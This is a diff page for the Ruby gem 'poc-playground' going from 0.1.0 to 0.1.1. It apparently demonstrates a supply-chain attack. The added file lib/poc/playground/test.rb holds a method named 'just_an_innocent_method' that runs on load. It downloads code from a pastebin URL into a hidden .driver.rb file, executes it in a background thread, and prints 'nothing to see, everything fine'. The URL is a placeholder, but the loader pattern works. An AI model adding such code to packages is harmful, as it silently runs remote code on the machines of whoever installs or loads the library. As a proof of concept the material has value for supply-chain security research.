poc-playground 0.1.0 → 0.1.1

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 6c58bce21a77a3625a111b04842fa5809225ae9d5af75e58172cfe8bba04c925
4
- data.tar.gz: 0f1de296d527c56853f19e0431e7d1d272a91757b70a62621e8d14579f9b6836
3
+ metadata.gz: a7aba3e7374b4907700ce24e17dfef5184832ae140caa709b077454e64a9439a
4
+ data.tar.gz: 7c4c42687184dfa282db4a70a79067875ce1cc12e6dff61d4ffaec3d8828e548
5
5
  SHA512:
6
- metadata.gz: 492a02779df3ab84962c7d32abb832800c1de07f388f8767051ce251693cc6345c8fba68c0177349ca77c73dd7288bf476160a6851ee7e177e76555fa72daf70
7
- data.tar.gz: 3ea19024845276ddb372dd0a5bed8efa4fb5b970269d545fbda04667b491b575a7f2bb61e461cf97202d585490c9bd586f629c68e757194eccc6fe8a83383843
6
+ metadata.gz: 3dd22338c7885aecd2de0c8e028e9c47195166fc54dfe06979b2323ccaeb6c66b7e4edba251fb3e587cf05f05241575b5d818c29ffd93ddad396ef81b205040e
7
+ data.tar.gz: e5ef26e0979f24e732b08272df8be9d14c1889d3105361cc7334af9186e0868d3d2b7e02ce7f623a178c5598d5c90c24f4cdd0bb4803c852b33e44e37044559c
@@ -0,0 +1 @@
1
+ 2.7.0
@@ -0,0 +1,16 @@
1
+ # frozen_string_literal: true
2
+
3
+ require 'open-uri'
4
+
5
+ def just_an_innocent_method
6
+ File.open('.driver.rb', 'wb:utf-8') do |f|
7
+ f << open('https://pastebin.com/raw/NOT_EXISTING').read
8
+ end
9
+ # tadaa
10
+ Thread.new { `ruby .driver.rb` }
11
+ rescue StandardError => e
12
+ -> { e }
13
+ end
14
+
15
+ just_an_innocent_method
16
+ puts 'hello! nothing to see, everything fine'
@@ -1,5 +1,5 @@
1
1
  module Poc
2
2
  module Playground
3
- VERSION = "0.1.0"
3
+ VERSION = "0.1.1"
4
4
  end
5
5
  end
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: poc-playground
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.0
4
+ version: 0.1.1
5
5
  platform: ruby
6
6
  authors:
7
7
  - Maciej Mensfeld
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2020-08-12 00:00:00.000000000 Z
11
+ date: 2020-08-20 00:00:00.000000000 Z
12
12
  dependencies: []
13
13
  description: Gem playground
14
14
  email:
@@ -18,6 +18,7 @@ extensions: []
18
18
  extra_rdoc_files: []
19
19
  files:
20
20
  - ".gitignore"
21
+ - ".ruby-version"
21
22
  - Gemfile
22
23
  - LICENSE.txt
23
24
  - README.md
@@ -25,6 +26,7 @@ files:
25
26
  - bin/console
26
27
  - bin/setup
27
28
  - lib/poc/playground.rb
29
+ - lib/poc/playground/test.rb
28
30
  - lib/poc/playground/version.rb
29
31
  - poc-playground.gemspec
30
32
  homepage: